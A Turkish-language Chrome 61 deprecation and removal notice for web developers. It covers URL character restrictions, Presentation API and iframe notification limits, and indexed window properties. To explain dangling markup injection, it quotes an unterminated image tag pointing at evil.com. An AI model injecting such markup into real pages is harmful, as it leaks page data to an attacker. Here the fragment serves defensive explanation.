Chrome'un neredeyse her sürümünde üründe, performansında ve Web Platformu'nun özelliklerinde önemli sayıda güncelleme ve iyileştirme görüyoruz. Bu makalede, 3 Ağustos itibarıyla beta sürümünde olan Chrome 61'de desteği sonlandırılan ve kaldırılan özellikler açıklanmaktadır. Bu liste herhangi bir zamanda değişebilir.
Güvenlik ve Gizlilik
URL'lerinde "\n" ve "<" karakterleri bulunan kaynakları engelleme
Harici bir uç noktaya veri göndermek için kısaltılmış bir URL'nin kullanıldığı sarkık işaretleme yerleştirme adlı bir tür saldırı vardır. Örneğin, <img src='https://evil.com/? içeren bir sayfayı ele alalım. URL'de kapanış tırnak işareti olmadığından tarayıcılar, bir sonraki tırnak işaretine kadar okur ve tırnak içine alınan karakterleri tek bir URL gibi işler.
Chrome 61, href ve src özelliklerinde izin verilen karakter kümelerini kısıtlayarak bu güvenlik açığını azaltır. Daha açık belirtmek gerekirse Chrome, yeni satır karakterlerine (\n) ve küçüktür karakterlerine (<) rastladığında URL'leri işlemeye son verir.
URL'de yeni satır ve küçüktür karakterleri için geçerli bir kullanım alanı olan geliştiriciler, bu karakterleri kaçış karakteri ile kullanmalıdır.
Kaldırma Niyeti | Chromestatus İzleyici | Chromium Hatası
Güvenli olmayan bağlamlarda Presentation API'nin desteğini sonlandırma ve kaldırma
Güvenli olmayan kaynaklarda Presentation API'nin, bilgisayar korsanlığı aracı olarak kullanılabileceği tespit edildi. Ekranlarda adres çubuğu olmadığından API, içeriği taklit etmek için kullanılabilir. Devam eden bir sunudaki verileri de sızdırabilirsiniz.
Blink'in güvenli olmayan kaynaklardaki güçlü özellikleri kaldırma amacıyla, güvenli olmayan bağlamlarda Presentation API desteğini kullanımdan kaldırmayı planlıyoruz. Chrome 61'den itibaren PresentationRequest.start() güvenli olmayan kaynaklarda artık çalışmayacaktır.
Kaldırma Niyeti | Chromestatus İzleyici | Chromium Hatası
JavaScript
Windows'ta dizine eklenen özelliklerin tanımlanmasına izin vermeme
Daha önce bazı tarayıcılar aşağıdaki gibi JavaScript atamalarına izin veriyordu:
window[0] = 1;
Mevcut HTML spesifikasyonunda bunun JavaScript spesifikasyonunun açık bir ihlali olduğu belirtilmektedir. Bu nedenle, bu özellik Chrome 61'de kaldırılmıştır. Firefox, Şubat 2016 itibarıyla bu politikaya uygundur.
Güvenli olmayan iFrame'lerden bildirim kullanımını kaldırma
İçerdiği sayfanın kaynağı ile isteği gönderen iFrame'in kaynağını ayırt etmek zor olduğundan, iFrame'lerden gelen izin istekleri kullanıcıların kafasını karıştırabilir. İstekler net bir kapsama sahip olmadığında kullanıcıların izin verip vermeyeceklerine karar vermeleri zor olur.
Iframe'lerde bildirimlere izin verilmemesi, bildirim izniyle ilgili şartların push bildirimleriyle uyumlu hale getirilmesini de sağlar. Bu da geliştiricilerin karşılaşacağı sorunları azaltır.
Bu işleve ihtiyaç duyan geliştiriciler, bildirim izni istemek için yeni bir pencere açabilir.